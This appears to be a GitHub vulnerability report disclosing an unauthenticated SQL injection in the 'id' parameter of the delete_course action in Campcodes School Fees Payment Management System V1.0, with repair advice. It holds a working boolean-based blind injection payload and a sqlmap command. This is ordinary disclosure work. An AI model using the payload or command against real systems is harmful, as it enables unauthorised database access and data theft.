Skip to content

Campcodes School Fees Payment Management System V1.0 /School_Fees_Payment_Management_System/ajax.php?action=delete_course SQL injection #1

@ProgramShowMaker

Description

@ProgramShowMaker

NAME OF AFFECTED PRODUCT(S)

  • School Fees Payment Management System

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

Vulnerable File

  • /School_Fees_Payment_Management_System/ajax.php?action=delete_course

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • A SQL injection vulnerability was found in the '/School_Fees_Payment_Management_System/ajax.php?action=delete_course ' file of the 'School Fees Payment Management System' project. The reason for this issue is that attackers inject malicious code from the parameter 'id' and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.

Impact

  • Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.

DESCRIPTION

  • During the security review of "School Fees Payment Management System",I discovered a critical SQL injection vulnerability in the "/School_Fees_Payment_Management_System/ajax.php?action=delete_course " file. This vulnerability stems from insufficient user input validation of the 'id' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.

No login or authorization is required to exploit this vulnerability

Vulnerability details and POC

Vulnerability location:

  • 'id‘ parameter

Payload:

Parameter: id (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (1921=1921) THEN '' ELSE (SELECT 8490 UNION SELECT 6898) END))&ef_no=123&student_id=2&course_id=1&total_fee=4,500.00

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

    sqlmap -u "http://172.20.10.2/School_Fees_Payment_Management_System/ajax.php?action=delete_course" -data="id=1" --dbs

Image

Suggested repair

  1. Use prepared statements and parameter binding:
    Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.

  2. Input validation and filtering:
    Strictly validate and filter user input data to ensure it conforms to the expected format.

  3. Minimize database user permissions:
    Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.

  4. Regular security audits:
    Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions